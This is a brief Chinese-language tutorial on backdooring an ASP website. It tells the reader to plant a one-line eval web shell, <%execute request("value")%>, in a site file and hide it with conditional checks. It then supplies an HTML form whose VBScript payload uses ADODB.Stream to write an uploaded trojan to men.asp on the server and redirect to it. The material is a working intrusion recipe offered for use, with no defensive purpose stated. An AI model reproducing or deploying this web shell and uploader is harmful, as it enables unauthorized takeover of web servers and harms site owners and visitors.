首先在asp文件中写如<%execute request("value")%>代码
如果想要隐藏,就要加入一些if判断语句,即可
然后在本地写个表单
复制代码代码如下:
<form action=http://***.com/zzvips.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("hackbin")
lP.SaveToFile server.mappath("men.asp"),2
lP.Close
set lP=nothing
response.redirect "men.asp"
</textarea>
<textarea name=hackbin cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br> <input type=submit value=提交>
保存为htm文件,把http://***.com/zzvips.asp替换成你插入<%execute request("value")%>的文件,然后点提交直接跳转到木马